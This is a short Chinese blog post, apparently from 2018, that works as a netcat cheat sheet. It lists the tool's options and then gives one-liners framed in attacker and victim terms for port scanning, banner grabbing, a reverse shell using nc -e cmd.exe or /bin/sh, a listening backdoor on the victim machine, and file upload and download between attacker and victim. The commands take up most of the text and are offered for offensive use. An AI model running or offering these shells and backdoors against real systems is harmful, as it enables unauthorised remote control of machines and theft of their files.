nc高级应用

 

参数介绍:


nc.exe -h即可看到各参数的使用方法。

基本格式:nc?[-options]?hostname?port[s]?[ports]?...

nc?-l?-p?port?[options]?[hostname]?[port]


-d:后台模式

-e:prog程序重定向,一旦连接,就执行?[危险!!]

-g:gatewaysource-routing hop point[s],?up?to?8

-G:numsource-routing?pointer:?4,?8,?12,?...

-h:帮助信息
-i :secs延时的间

-l:监听模式,用于入站连接

-L:连接关闭后,仍然继续监听

-n:指定数字的IP地址,不能用hostname

-o:file记录16进制的传输

-p:port本地端口号

-r:随机本地及远程端口

-s:addr本地源地址

-t:使用TELNET交互方式

-u:UDP模式

-v:详细输出--用两个-v可得到更详细的内容

-w:secs timeout的时间

-z:将输入输出关掉--用于扫描时


1.端口的刺探:
nc -vv ip port


2.获取banner
nc -nv ip port

 

3.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
例子:
格式:nc -nvv -w 2 -z 192.168.14.80-445

这样扫描会留下大量的痕迹,系统管理员会额外小心


4.反向连接
 攻击者机器:
  nc -l -n -p 54
  目标机器:
  nc -e cmd.exe ip 54 (这个时候该窗口将得到交互式的SHELL)
或者
  nc -e /bin/sh ip 54

  

5.后门
victim machine: //目标机器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux

attacker machine: //攻击者机器.
nc ip port //连接victim_IP,然后得到一个shell。

 

6.传送文件

上传文件:
nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell执行

下载文件
nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell执行
nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出

 

8.传输文本信息
服务端 A:nc -l -p 4444
客户端 B:nc -nv 1.1.1.1 4444

posted @ 2018-09-27 17:30  -零  阅读(415)  评论(0编辑  收藏  举报